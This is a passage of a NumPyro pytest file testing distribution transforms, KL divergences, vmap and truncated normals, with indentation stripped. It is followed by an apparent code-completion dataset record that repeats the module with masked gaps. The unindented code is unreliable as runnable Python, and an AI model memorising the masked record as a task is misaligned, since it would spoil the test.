matrix
+ jnp.swapaxes(matrix, -2, -1)
+ jnp.identity(matrix.shape[-1])
)
return transform.inv(matrix)
expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]
elif constraint in [
constraints.lower_cholesky,
constraints.scaled_unit_lower_cholesky,
constraints.positive_definite,
constraints.softplus_lower_cholesky,
]:
vec_transform = lambda x: matrix_to_tril_vec(transform(x)) # noqa: E731
y_tril = matrix_to_tril_vec(y)
def inv_vec_transform(y):
matrix = vec_to_tril_matrix(y)
if constraint is constraints.positive_definite:
# fill the upper triangular part
matrix = (
matrix
+ jnp.swapaxes(matrix, -2, -1)
- jnp.diag(jnp.diag(matrix))
)
return transform.inv(matrix)
expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]
else:
expected = jnp.log(jnp.abs(grad(transform)(x)))
inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))
assert_allclose(actual, expected, atol=1e-5, rtol=1e-5)
assert_allclose(actual, -inv_expected, atol=1e-5, rtol=1e-5)
# NB: skip transforms which are tested in `test_biject_to`
@pytest.mark.parametrize(
"transform, event_shape",
[
(PermuteTransform(np.array([3, 0, 4, 1, 2])), (5,)),
(PowerTransform(2.0), ()),
(SoftplusTransform(), ()),
(
LowerCholeskyAffine(
np.array([1.0, 2.0]), np.array([[0.6, 0.0], [1.5, 0.4]])
),
(2,),
),
(
transforms.ComposeTransform(
[
biject_to(constraints.simplex),
SimplexToOrderedTransform(0.0),
biject_to(constraints.ordered_vector).inv,
]
),
(5,),
),
],
)
@pytest.mark.parametrize(
"batch_shape",
[
(),
(1,),
(3,),
(6,),
(3, 1),
(1, 3),
(5, 3),
],
)
def test_bijective_transforms(transform, event_shape, batch_shape):
shape = batch_shape + event_shape
rng_key = random.PRNGKey(0)
x = biject_to(transform.domain)(random.normal(rng_key, shape))
y = transform(x)
# test codomain
assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))
# test inv
z = transform.inv(y)
assert_allclose(x, z, atol=1e-6, rtol=1e-4)
assert transform.inv.inv is transform
assert transform.inv is transform.inv
assert transform.domain is transform.inv.codomain
assert transform.codomain is transform.inv.domain
# test domain
assert_array_equal(transform.domain(z), jnp.ones(batch_shape))
# test log_abs_det_jacobian
actual = transform.log_abs_det_jacobian(x, y)
assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))
assert jnp.shape(actual) == batch_shape
if len(shape) == transform.domain.event_dim:
if len(event_shape) == 1:
expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]
inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]
else:
expected = jnp.log(jnp.abs(grad(transform)(x)))
inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))
assert_allclose(actual, expected, atol=1e-6)
assert_allclose(actual, -inv_expected, atol=1e-6)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_composed_transform(batch_shape):
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
t = transforms.ComposeTransform([t1, t2, t1])
assert t.domain.event_dim == 1
assert t.codomain.event_dim == 2
x = np.random.normal(size=batch_shape + (6,))
y = t(x)
log_det = t.log_abs_det_jacobian(x, y)
assert log_det.shape == batch_shape
expected_log_det = (
jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2) + jnp.log(2) * 9
)
assert_allclose(log_det, expected_log_det)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_composed_transform_1(batch_shape):
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
t = transforms.ComposeTransform([t1, t2, t2])
assert t.domain.event_dim == 1
assert t.codomain.event_dim == 3
x = np.random.normal(size=batch_shape + (6,))
y = t(x)
log_det = t.log_abs_det_jacobian(x, y)
assert log_det.shape == batch_shape
z = t2(x * 2)
expected_log_det = (
jnp.log(2) * 6
+ t2.log_abs_det_jacobian(x * 2, z)
+ t2.log_abs_det_jacobian(z, t2(z)).sum(-1)
)
assert_allclose(log_det, expected_log_det)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
def test_simplex_to_order_transform(batch_shape):
simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()
simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)
transform = SimplexToOrderedTransform()
out = transform(simplex)
assert out.shape == transform.forward_shape(simplex.shape)
assert simplex.shape == transform.inverse_shape(out.shape)
@pytest.mark.parametrize("batch_shape", [(), (5,)])
@pytest.mark.parametrize("prepend_event_shape", [(), (4,)])
@pytest.mark.parametrize("sample_shape", [(), (7,)])
def test_transformed_distribution(batch_shape, prepend_event_shape, sample_shape):
base_dist = (
dist.Normal(0, 1)
.expand(batch_shape + prepend_event_shape + (6,))
.to_event(1 + len(prepend_event_shape))
)
t1 = transforms.AffineTransform(0, 2)
t2 = transforms.LowerCholeskyTransform()
d = dist.TransformedDistribution(base_dist, [t1, t2, t1])
assert d.event_dim == 2 + len(prepend_event_shape)
y = d.sample(random.PRNGKey(0), sample_shape)
t = transforms.ComposeTransform([t1, t2, t1])
x = t.inv(y)
assert x.shape == sample_shape + base_dist.shape()
log_prob = d.log_prob(y)
assert log_prob.shape == sample_shape + batch_shape
t_log_det = t.log_abs_det_jacobian(x, y)
if prepend_event_shape:
t_log_det = t_log_det.sum(-1)
expected_log_prob = base_dist.log_prob(x) - t_log_det
assert_allclose(log_prob, expected_log_prob, atol=1e-5)
@pytest.mark.parametrize(
"transformed_dist",
[
dist.TransformedDistribution(
dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()
),
dist.TransformedDistribution(
dist.Exponential(jnp.ones(2)),
[
transforms.PowerTransform(0.7),
transforms.AffineTransform(0.0, jnp.ones(2) * 3),
],
),
],
)
def test_transformed_distribution_intermediates(transformed_dist):
sample, intermediates = transformed_dist.sample_with_intermediates(
random.PRNGKey(1)
)
assert_allclose(
transformed_dist.log_prob(sample, intermediates),
transformed_dist.log_prob(sample),
)
def test_transformed_transformed_distribution():
loc, scale = -2, 3
dist1 = dist.TransformedDistribution(
dist.Normal(2, 3), transforms.PowerTransform(2.0)
)
dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(-2, 3))
assert isinstance(dist2.base_dist, dist.Normal)
assert len(dist2.transforms) == 2
assert isinstance(dist2.transforms[0], transforms.PowerTransform)
assert isinstance(dist2.transforms[1], transforms.AffineTransform)
rng_key = random.PRNGKey(0)
assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))
intermediates = dist2.sample_with_intermediates(rng_key)
assert len(intermediates) == 2
def _make_iaf(input_dim, hidden_dims, rng_key):
arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])
_, init_params = arn_init(rng_key, (input_dim,))
return InverseAutoregressiveTransform(partial(arn, init_params))
@pytest.mark.parametrize(
"ts",
[
[transforms.PowerTransform(0.7), transforms.AffineTransform(2.0, 3.0)],
[transforms.ExpTransform()],
[
transforms.ComposeTransform(
[transforms.AffineTransform(-2, 3), transforms.ExpTransform()]
),
transforms.PowerTransform(3.0),
],
[
_make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(0)),
transforms.PermuteTransform(jnp.arange(5)[::-1]),
_make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(1)),
],
],
)
def test_compose_transform_with_intermediates(ts):
transform = transforms.ComposeTransform(ts)
x = random.normal(random.PRNGKey(2), (7, 5))
y, intermediates = transform.call_with_intermediates(x)
logdet = transform.log_abs_det_jacobian(x, y, intermediates)
assert_allclose(y, transform(x))
assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))
@pytest.mark.parametrize("x_dim, y_dim", [(3, 3), (3, 4)])
def test_unpack_transform(x_dim, y_dim):
xy = np.random.randn(x_dim + y_dim)
unpack_fn = lambda xy: {"x": xy[:x_dim], "y": xy[x_dim:]} # noqa: E731
transform = transforms.UnpackTransform(unpack_fn)
z = transform(xy)
if x_dim == y_dim:
with pytest.warns(UserWarning, match="UnpackTransform.inv"):
t = transform.inv(z)
else:
t = transform.inv(z)
assert_allclose(t, xy)
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS)
def test_generated_sample_distribution(
jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)
):
"""On samplers that we do not get directly from JAX, (e.g. we only get
Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test
agreement in the empirical distribution of generated samples between our
samplers and those from SciPy.
"""
if jax_dist not in [dist.Gumbel]:
pytest.skip(
"{} sampling method taken from upstream, no need to"
"test generated samples.".format(jax_dist.__name__)
)
jax_dist = jax_dist(*params)
if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:
our_samples = jax_dist.sample(key, (N_sample,))
ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)
assert ks_result.pvalue > 0.05
@pytest.mark.parametrize(
"jax_dist, params, support",
[
(dist.BernoulliLogits, (5.0,), jnp.arange(2)),
(dist.BernoulliProbs, (0.5,), jnp.arange(2)),
(dist.BinomialLogits, (4.5, 10), jnp.arange(11)),
(dist.BinomialProbs, (0.5, 11), jnp.arange(12)),
(dist.BetaBinomial, (2.0, 0.5, 12), jnp.arange(13)),
(dist.CategoricalLogits, (np.array([3.0, 4.0, 5.0]),), jnp.arange(3)),
(dist.CategoricalProbs, (np.array([0.1, 0.5, 0.4]),), jnp.arange(3)),
],
)
@pytest.mark.parametrize("batch_shape", [(5,), ()])
@pytest.mark.parametrize("expand", [False, True])
def test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand):
p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))
actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)
expected = support.reshape((-1,) + (1,) * len(batch_shape))
if expand:
expected = jnp.broadcast_to(expected, support.shape + batch_shape)
assert_allclose(actual, expected)
def test_zero_inflated_enumerate_support():
base_dist = dist.Bernoulli(0.5)
d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)
assert d.has_enumerate_support
assert_allclose(d.enumerate_support(), base_dist.enumerate_support())
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS + DISCRETE)
@pytest.mark.parametrize("prepend_shape", [(), (2, 3)])
@pytest.mark.parametrize("sample_shape", [(), (4,)])
def test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):
jax_dist = jax_dist(*params)
new_batch_shape = prepend_shape + jax_dist.batch_shape
expanded_dist = jax_dist.expand(new_batch_shape)
rng_key = random.PRNGKey(0)
samples = expanded_dist.sample(rng_key, sample_shape)
assert expanded_dist.batch_shape == new_batch_shape
assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape
assert expanded_dist.log_prob(samples).shape == sample_shape + new_batch_shape
# test expand of expand
assert (
expanded_dist.expand((3,) + new_batch_shape).batch_shape
== (3,) + new_batch_shape
)
# test expand error
if prepend_shape:
with pytest.raises(ValueError, match="Cannot broadcast distribution of shape"):
assert expanded_dist.expand((3,) + jax_dist.batch_shape)
@pytest.mark.parametrize("base_shape", [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1, 5)])
@pytest.mark.parametrize("event_dim", [0, 1, 2, 3])
@pytest.mark.parametrize("sample_shape", [(1000,), (1000, 7, 1), (1000, 1, 7)])
def test_expand_shuffle_regression(base_shape, event_dim, sample_shape):
expand_shape = (2, 3, 5)
event_dim = min(event_dim, len(base_shape))
loc = random.normal(random.PRNGKey(0), base_shape) * 10
base_dist = dist.Normal(loc, 0.1).to_event(event_dim)
expanded_dist = base_dist.expand(expand_shape[: len(expand_shape) - event_dim])
samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)
expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.shape())
assert_allclose(samples.mean(0), expected_mean, atol=0.1)
@pytest.mark.parametrize("batch_shape", [(), (4,), (10, 3)])
def test_sine_bivariate_von_mises_batch_shape(batch_shape):
phi_loc = jnp.broadcast_to(jnp.array(0.0), batch_shape)
psi_loc = jnp.array(0.0)
phi_conc = jnp.array(1.0)
psi_conc = jnp.array(1.0)
corr = jnp.array(0.1)
sine = SineBivariateVonMises(phi_loc, psi_loc, phi_conc, psi_conc, corr)
assert sine.batch_shape == batch_shape
samples = sine.sample(random.PRNGKey(0))
assert samples.shape == (*batch_shape, 2)
def test_sine_bivariate_von_mises_sample_mean():
loc = jnp.array([[2.0, -1.0], [-2, 1.0]])
sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)
samples = sine.sample(random.PRNGKey(0), (5000,))
assert_allclose(_circ_mean(samples).T, loc, rtol=5e-3)
@pytest.mark.parametrize("batch_shape", [(), (4,)])
def test_polya_gamma(batch_shape, num_points=20000):
d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)
rng_key = random.PRNGKey(0)
# test density approximately normalized
x = jnp.linspace(1.0e-6, d.truncation_point, num_points)
prob = (d.truncation_point / num_points) * jnp.exp(
logsumexp(d.log_prob(x), axis=-1)
)
assert_allclose(prob, jnp.ones(batch_shape), rtol=1.0e-4)
# test mean of approximate sampler
z = d.sample(rng_key, sample_shape=(3000,))
mean = jnp.mean(z, axis=-1)
assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)
@pytest.mark.parametrize(
"extra_event_dims,expand_shape",
[(0, (4, 3, 2, 1)), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))],
)
def test_expand_reshaped_distribution(extra_event_dims, expand_shape):
loc = jnp.zeros((1, 6))
scale_tril = jnp.eye(6)
d = dist.MultivariateNormal(loc, scale_tril=scale_tril)
full_shape = (4, 1, 1, 1, 6)
reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)
cut = 4 - extra_event_dims
batch_shape, event_shape = full_shape[:cut], full_shape[cut:]
assert reshaped_dist.batch_shape == batch_shape
assert reshaped_dist.event_shape == event_shape
large = reshaped_dist.expand(expand_shape)
assert large.batch_shape == expand_shape
assert large.event_shape == event_shape
# Throws error when batch shape cannot be broadcasted
with pytest.raises((RuntimeError, ValueError)):
reshaped_dist.expand(expand_shape + (3,))
# Throws error when trying to shrink existing batch shape
with pytest.raises((RuntimeError, ValueError)):
large.expand(expand_shape[1:])
@pytest.mark.parametrize(
"batch_shape, mask_shape",
[((), ()), ((2,), ()), ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))],
)
@pytest.mark.parametrize("event_shape", [(), (3,)])
def test_mask(batch_shape, event_shape, mask_shape):
jax_dist = (
dist.Normal().expand(batch_shape + event_shape).to_event(len(event_shape))
)
mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)
if mask_shape == ():
mask = bool(mask)
samples = jax_dist.sample(random.PRNGKey(1))
actual = jax_dist.mask(mask).log_prob(samples)
assert_allclose(
actual != 0,
jnp.broadcast_to(mask, lax.broadcast_shapes(batch_shape, mask_shape)),
)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 4)])
def test_mask_grad(event_shape):
def f(x, data):
base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()
mask = jnp.all(
jnp.isfinite(data), tuple(-i - 1 for i in range(len(event_shape)))
)
log_prob = base_dist.mask(mask).log_prob(data)
assert log_prob.shape == data.shape[: len(data.shape) - len(event_shape)]
return log_prob.sum()
data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])
log_prob, grad = jax.value_and_grad(f)(1.0, data)
assert jnp.isfinite(grad) and jnp.isfinite(log_prob)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_dist_pytree(jax_dist, sp_dist, params):
def f(x):
return jax_dist(*params)
if jax_dist is _ImproperWrapper:
pytest.skip("Cannot flattening ImproperUniform")
if jax_dist is dist.EulerMaruyama:
pytest.skip("EulerMaruyama doesn't define flatten/unflatten")
jax.jit(f)(0) # this test for flatten/unflatten
lax.map(f, np.ones(3)) # this test for compatibility w.r.t. scan
# Test that parameters do not change after flattening.
expected_dist = f(0)
actual_dist = jax.jit(f)(0)
expected_sample = expected_dist.sample(random.PRNGKey(0))
actual_sample = actual_dist.sample(random.PRNGKey(0))
expected_log_prob = expected_dist.log_prob(expected_sample)
actual_log_prob = actual_dist.log_prob(actual_sample)
assert_allclose(actual_sample, expected_sample, rtol=1e-6)
assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-6)
@pytest.mark.parametrize(
"method, arg", [("to_event", 1), ("mask", False), ("expand", [5])]
)
def test_special_dist_pytree(method, arg):
def f(x):
d = dist.Normal(np.zeros(1), np.ones(1))
return getattr(d, method)(arg)
jax.jit(f)(0)
lax.map(f, np.ones(3))
def test_expand_no_unnecessary_batch_shape_expansion():
# ExpandedDistribution can mutate the `batch_shape` of
# its base distribution in order to make ExpandedDistribution
# mappable, see #684. However, this mutation should not take
# place if no mapping operation is performed.
for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):
# Low level test: ensure that (tree_flatten o tree_unflatten)(expanded_dist)
# amounts to an identity operation.
d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])
roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])
assert d.batch_shape == roundtripped_d.batch_shape
assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape
assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape
assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)
assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)
# High-level test: `jax.jit`ting a function returning an ExpandedDistribution
# (which involves an instance of the low-level case as it will transform
# the original function by adding some flattening and unflattening steps)
# should return same object as its non-jitted equivalent.
def bs(arg):
return dist.Normal(arg, arg).expand([10, 3, *arg.shape])
d = bs(arg)
dj = jax.jit(bs)(arg)
assert isinstance(d, dist.ExpandedDistribution)
assert isinstance(dj, dist.ExpandedDistribution)
assert d.batch_shape == dj.batch_shape
assert d.base_dist.batch_shape == dj.base_dist.batch_shape
assert d.base_dist.event_shape == dj.base_dist.event_shape
assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)
assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_delta_normal_shape(batch_shape):
v = np.random.normal(size=batch_shape)
loc = np.random.normal(size=batch_shape)
scale = np.exp(np.random.normal(size=batch_shape))
p = dist.Delta(v)
q = dist.Normal(loc, scale)
assert kl_divergence(p, q).shape == batch_shape
def test_kl_delta_normal():
v = np.random.normal()
loc = np.random.normal()
scale = np.exp(np.random.normal())
p = dist.Delta(v, 10.0)
q = dist.Normal(loc, scale)
assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_independent_normal(batch_shape, event_shape):
shape = batch_shape + event_shape
p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))
q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))
actual = kl_divergence(
dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))
)
expected = sum_rightmost(kl_divergence(p, q), len(event_shape))
assert_allclose(actual, expected)
@pytest.mark.parametrize("batch_shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize("event_shape", [(), (4,), (2, 3)], ids=str)
def test_kl_expanded_normal(batch_shape, event_shape):
shape = batch_shape + event_shape
p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)
q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)
actual = kl_divergence(
dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))
)
expected = sum_rightmost(kl_divergence(p, q), len(event_shape))
assert_allclose(actual, expected)
@pytest.mark.parametrize("shape", [(), (4,), (2, 3)], ids=str)
@pytest.mark.parametrize(
"p_dist, q_dist",
[
(dist.Beta, dist.Beta),
(dist.Gamma, dist.Gamma),
(dist.Kumaraswamy, dist.Beta),
(dist.Normal, dist.Normal),
(dist.Weibull, dist.Gamma),
],
)
def test_kl_univariate(shape, p_dist, q_dist):
def make_dist(dist_class):
params = {}
for k, c in dist_class.arg_constraints.items():
if c is constraints.real:
params[k] = np.random.normal(size=shape)
elif c is constraints.positive:
params[k] = np.exp(np.random.normal(size=shape))
else:
raise ValueError(f"Missing pattern for param {k}.")
d = dist_class(**params)
if dist_class is dist.Kumaraswamy:
d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000
return d
p = make_dist(p_dist)
q = make_dist(q_dist)
actual = kl_divergence(p, q)
x = p.sample(random.PRNGKey(0), (10000,)).copy()
expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)
assert_allclose(actual, expected, rtol=0.05)
@pytest.mark.parametrize("shape", [(4,), (2, 3)], ids=str)
def test_kl_dirichlet_dirichlet(shape):
p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))
q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))
actual = kl_divergence(p, q)
x = p.sample(random.PRNGKey(0), (10_000,)).copy()
expected = jnp.mean((p.log_prob(x) - q.log_prob(x)), 0)
assert_allclose(actual, expected, rtol=0.05)
def test_vmapped_binomial_p0():
# test that vmapped binomial with p = 0 does not have an infinite loop
def sample_binomial_withp0(key):
n = 2 * (random.uniform(key) > 0.5)
_, key = random.split(key)
return dist.Binomial(total_count=n, probs=0).sample(key)
jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))
def _get_vmappable_dist_init_params(jax_dist):
if jax_dist.__name__ == ("_TruncatedCauchy"):
return [2, 3]
elif jax_dist.__name__ == ("_TruncatedNormal"):
return [2, 3]
elif issubclass(jax_dist, dist.Distribution):
init_parameters = list(inspect.signature(jax_dist.__init__).parameters.keys())[
1:
]
vmap_over_parameters = list(
inspect.signature(vmap_over.dispatch(jax_dist)).parameters.keys()
)[1:]
return list(
[
i
for i, name in enumerate(init_parameters)
if name in vmap_over_parameters
]
)
else:
raise ValueError
def _allclose_or_equal(a1, a2):
if isinstance(a1, np.ndarray):
return np.allclose(a2, a1)
elif isinstance(a1, jnp.ndarray):
return jnp.allclose(a2, a1)
elif isinstance(a1, csr_matrix):
return np.allclose(a2.todense(), a1.todense())
else:
return a2 == a1 or a2 is a1
def _tree_equal(t1, t2):
t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)
return jnp.all(jax.flatten_util.ravel_pytree(t)[0])
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_vmap_dist(jax_dist, sp_dist, params):
param_names = list(inspect.signature(jax_dist).parameters.keys())
vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)
vmappable_param_idxs = vmappable_param_idxs[: len(params)]
if len(vmappable_param_idxs) == 0:
return
def make_jax_dist(*params):
return jax_dist(*params)
def sample(d: dist.Distribution):
return d.sample(random.PRNGKey(0))
d = make_jax_dist(*params)
if isinstance(d, _SparseCAR) and d.is_sparse:
# In this case, since csr arrays are not jittable,
# _SparseCAR has a csr_matrix as part of its pytree
# definition (not as a pytree leaf). This causes pytree
# operations like tree_map to fail, since these functions
# compare the pytree def of each of the arguments using ==
# which is ambiguous for array-like objects.
return
in_out_axes_cases = [
# vmap over all args
(
tuple(0 if i in vmappable_param_idxs else None for i in range(len(params))),
0,
),
# vmap over a single arg, out over all attributes of a distribution
*(
([0 if i == idx else None for i in range(len(params))], 0)
for idx in vmappable_param_idxs
if params[idx] is not None
),
# vmap over a single arg, out over the associated attribute of the distribution
*(
(
[0 if i == idx else None for i in range(len(params))],
vmap_over(d, **{param_names[idx]: 0}),
)
for idx in vmappable_param_idxs
if params[idx] is not None
),
# vmap over a single arg, axis=1, (out single attribute, axis=1)
*(
(
[1 if i == idx else None for i in range(len(params))],
vmap_over(d, **{param_names[idx]: 1}),
)
for idx in vmappable_param_idxs
if isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).ndim > 0
# skip this distribution because _GeneralMixture.__init__ turns
# 1d inputs into 0d attributes, thus breaks the expectations of
# the vmapping test case where in_axes=1, only done for rank>=1 tensors.
and jax_dist is not _GeneralMixture
),
]
for in_axes, out_axes in in_out_axes_cases:
batched_params = [
jax.tree_map(lambda x: jnp.expand_dims(x, ax), arg)
if isinstance(ax, int)
else arg
for arg, ax in zip(params, in_axes)
]
# Recreate the jax_dist to avoid side effects coming from `d.sample`
# triggering lazy_property computations, which, in a few cases, break
# vmap_over's expectations regarding existing attributes to be vmapped.
d = make_jax_dist(*params)
batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes)(
*batched_params
)
eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(
batched_d, d
)
assert eq == jnp.array([True])
samples_dist = sample(d)
samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)
assert samples_batched_dist.shape == (1, *samples_dist.shape)
def test_multinomial_abstract_total_count():
probs = jnp.array([0.2, 0.5, 0.3])
key = random.PRNGKey(0)
def f(x):
total_count = x.sum(-1)
return dist.Multinomial(total_count, probs=probs, total_count_max=10).sample(
key
)
x = dist.Multinomial(10, probs).sample(key)
y = jax.jit(f)(x)
assert_allclose(x, y, rtol=1e-6)
def test_normal_log_cdf():
# test if log_cdf method agrees with jax.scipy.stats.norm.logcdf
# and if exp(log_cdf) agrees with cdf
loc = jnp.array([[0.0, -10.0, 20.0]])
scale = jnp.array([[1, 5, 7]])
values = jnp.linspace(-5, 5, 100).reshape(-1, 1)
numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)
numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)
jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)
assert_allclose(numpyro_log_cdf, jax_log_cdf)
assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-6)
@pytest.mark.parametrize(
"value",
[
-15.0,
jnp.array([[-15.0], [-10.0], [-5.0]]),
jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]]),
],
)
def test_truncated_normal_log_prob_in_tail(value):
# define set of distributions truncated in tail of distribution
loc = 1.35
scale = jnp.geomspace(0.01, 1, 10)
low, high = (-20, -1.0)
a, b = (low - loc) / scale, (high - loc) / scale # rescale for jax input
numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high).log_prob(
value
)
jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)
assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)
def test_sample_truncated_normal_in_tail():
# test, if samples from distributions truncated in
# tail of distribution returns any inf's
tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)
samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10_000,))
assert ~jnp.isinf(samples).any()
@jax.enable_custom_prng()
def test_jax_custom_prng():
samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))
assert ~jnp.isinf(samples).any()
|
normal
|
{
"blob_id": "c5e7fdcbd4a9281597a35a180f2853caac68f811",
"index": 7562,
"step-1": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\n<mask token>\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\n<mask token>\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask 